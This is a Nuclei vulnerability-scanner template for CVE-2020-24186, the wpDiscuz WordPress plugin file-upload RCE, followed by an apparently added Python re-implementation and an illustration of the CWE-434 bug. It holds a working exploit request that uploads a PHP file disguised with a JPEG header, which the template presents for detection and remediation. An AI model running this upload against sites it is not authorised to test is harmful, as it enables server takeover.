id: CVE-2020-24186

info:
  name: WordPress wpDiscuz <=7.0.4 - Remote Code Execution
  author: Ganofins
  severity: critical
  description: WordPress wpDiscuz plugin versions 7.0 through 7.0.4 are susceptible to remote code execution. The flaw lets unauthenticated attackers upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server.
  impact: |
    Successful exploitation of this vulnerability can lead to arbitrary code execution on the affected WordPress site.
  remediation: |
    Update the wpDiscuz plugin to the latest version (>=7.0.5) to mitigate this vulnerability.
  reference:
    - https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
    - https://nvd.nist.gov/vuln/detail/CVE-2020-24186
    - https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/
    - http://packetstormsecurity.com/files/162983/WordPress-wpDiscuz-7.0.4-Shell-Upload.html
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2020-24186
    cwe-id: CWE-434
    epss-score: 0.97489
    epss-percentile: 0.99973
    cpe: cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: gvectors
    product: wpdiscuz
    framework: wordpress
  tags: cve,cve2020,rce,fileupload,packetstorm,wordpress,wp-plugin,intrusive,gvectors

http:
  - raw:
      - |
        GET /?p=1 HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}

        ------WebKitFormBoundary88AhjLimsDMHU1Ak
        Content-Disposition: form-data; name="action"

        wmuUploadFiles
        ------WebKitFormBoundary88AhjLimsDMHU1Ak
        Content-Disposition: form-data; name="wmu_nonce"

        {{wmuSecurity}}
        ------WebKitFormBoundary88AhjLimsDMHU1Ak
        Content-Disposition: form-data; name="wmuAttachmentsData"

        undefined
        ------WebKitFormBoundary88AhjLimsDMHU1Ak
        Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php"
        Content-Type: image/png

        {{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}
        <?php phpinfo();?>
        ------WebKitFormBoundary88AhjLimsDMHU1Ak
        Content-Disposition: form-data; name="postId"

        1
        ------WebKitFormBoundary88AhjLimsDMHU1Ak--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'success":true'
          - 'fullname'
          - 'shortname'
          - 'url'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: wmuSecurity
        group: 1
        regex:
          - 'wmuSecurity":"([a-z0-9]+)'
        internal: true
        part: body

      - type: regex
        group: 1
        regex:
          - '"url":"([a-z:\\/0-9-.]+)"'
        part: body

# digest: 4b0a00483046022100e38932a4bbaeb966d0ff133b826f339af5d5ced828fa938d65afd4ca069940b602210086ec11b8bf600caea0125a35dd2eab8c0843a0335c30b73c7a29838c73c03bca:922c64590222798bb761d5b6d8e72950
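
Worked example, added here and not part of this template or of wpDiscuz's own code: a Python re-implementation of the two-request flow above (nonce extraction from the first response, the multipart body of the second request, and the template's matchers and extractors), runnable offline against constructed stand-ins for the page and the JSON reply, followed by an illustrative CWE-434 check showing why the payload passes a magic-bytes-only test and fails an extension-allowlist one. Assumptions: the host example.test, the JSON layouts of SAMPLE_PAGE and SAMPLE_SUCCESS, and the allowlist in accept_upload_hardened are invented; sniff_says_image stands for the bug class, not for the plugin's actual code before or after the patch.

```python
import base64
import json
import re

# Constructed stand-in for the body the first request (GET /?p=1) returns.
# wpDiscuz prints its upload nonce into the page as a "wmuSecurity" JSON value;
# the object layout here is invented, only the key name matters.
SAMPLE_PAGE = (
    '<script>var wpdiscuzAjaxObj = {"url":"https:\\/\\/example.test\\/wp-admin\\/admin-ajax.php",'
    '"wmuSecurity":"1f2e3d4c5b"};</script>'
)

# Constructed stand-in for a vulnerable site's JSON reply (layout invented; the
# template only looks at four words and the "url" key). PHP's json_encode
# escapes "/" as "\/" by default, so the sample does too.
SAMPLE_SUCCESS = json.dumps(
    {"success": True,
     "data": {"files": [{"fullname": "rce-1.php", "shortname": "rce-1.php",
                         "url": "https://example.test/wp-content/uploads/2020/07/rce-1.php"}]}},
    separators=(",", ":"),
).replace("/", "\\/")

# The template's file body: its base64 literal (decodes to a JPEG/Exif header,
# FF D8 FF E1 ...) followed by a newline and the PHP probe, as the raw request lays it out.
IMAGE_MAGIC = base64.b64decode(
    "/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/"
    "UpGSUb9/f39/9tD/f0M/QwK/f0="
)
PHP_PROBE = b"<?php phpinfo();?>"
PAYLOAD = IMAGE_MAGIC + b"\n" + PHP_PROBE
BOUNDARY = "----WebKitFormBoundary88AhjLimsDMHU1Ak"

NONCE_RE = re.compile(r'wmuSecurity":"([a-z0-9]+)')   # the template's internal extractor
URL_RE = re.compile(r'"url":"([a-z:\\/0-9-.]+)"')     # the template's url extractor
SUCCESS_WORDS = ('success":true', "fullname", "shortname", "url")


def extract_nonce(page_body: str):
    """Step 1: pull the wmu_nonce value the upload request needs."""
    m = NONCE_RE.search(page_body)
    return m.group(1) if m else None


def build_upload_body(nonce: str, post_id: int, filename: str, content: bytes) -> bytes:
    """Step 2: the multipart/form-data body for action=wmuUploadFiles."""
    dash_boundary = ("--" + BOUNDARY).encode()
    crlf = b"\r\n"
    out = b""
    for name, value in (("action", b"wmuUploadFiles"),
                        ("wmu_nonce", nonce.encode()),
                        ("wmuAttachmentsData", b"undefined")):
        out += (dash_boundary + crlf
                + b'Content-Disposition: form-data; name="' + name.encode() + b'"' + crlf
                + crlf + value + crlf)
    out += (dash_boundary + crlf
            + b'Content-Disposition: form-data; name="wmu_files[0]"; filename="'
            + filename.encode() + b'"' + crlf
            + b"Content-Type: image/png" + crlf   # declared type; the bytes are a JPEG header
            + crlf + content + crlf)
    out += (dash_boundary + crlf
            + b'Content-Disposition: form-data; name="postId"' + crlf
            + crlf + str(post_id).encode() + crlf)
    return out + dash_boundary + b"--" + crlf


def upload_succeeded(status: int, body: str) -> bool:
    """The template's matchers: HTTP 200 AND all four words present."""
    return status == 200 and all(w in body for w in SUCCESS_WORDS)


def extract_uploaded_url(body: str):
    """The template's second extractor, with PHP's escaped slashes undone."""
    m = URL_RE.search(body)
    return m.group(1).replace("\\/", "/") if m else None


# The CWE-434 side: why this payload passes a sniff-only check but not a combined
# one. Illustrative of the bug class (assumption), not wpDiscuz's actual code.
ALLOWED_IMAGE_EXT = {"jpg", "jpeg", "png", "gif"}   # invented allowlist


def sniff_says_image(content: bytes) -> bool:
    """Magic-bytes-only check: JPEG (FF D8 FF) or PNG signature."""
    return content.startswith(b"\xff\xd8\xff") or content.startswith(b"\x89PNG\r\n\x1a\n")


def accept_upload_hardened(filename: str, content: bytes) -> bool:
    """Extension allowlist AND signature must agree: 'rce.php' fails here even
    though its first bytes sniff as a JPEG."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in ALLOWED_IMAGE_EXT and sniff_says_image(content)


if __name__ == "__main__":
    nonce = extract_nonce(SAMPLE_PAGE)
    body = build_upload_body(nonce, 1, "rce.php", PAYLOAD)
    print("nonce:", nonce, "| multipart body bytes:", len(body))
    print("matchers fire:", upload_succeeded(200, SAMPLE_SUCCESS),
          "| url:", extract_uploaded_url(SAMPLE_SUCCESS))
    print("sniff-only accepts rce.php:", sniff_says_image(PAYLOAD),
          "| hardened accepts rce.php:", accept_upload_hardened("rce.php", PAYLOAD))
```

Two things the re-implementation makes visible. The bytes behind the template's base64 literal begin FF D8 FF E1 "Exif", a JPEG header, while the file part declares Content-Type: image/png; the probe therefore only passes a server that sniffs the content and ignores the declared type. And the url extractor's character class is lowercase-only, so an uploads URL containing an uppercase host or path segment satisfies the word matcher but yields no extracted URL. The template is tagged intrusive for a reason: a successful run leaves the uploaded file on the target at the URL the second extractor reports, so record that URL and remove the file after the test.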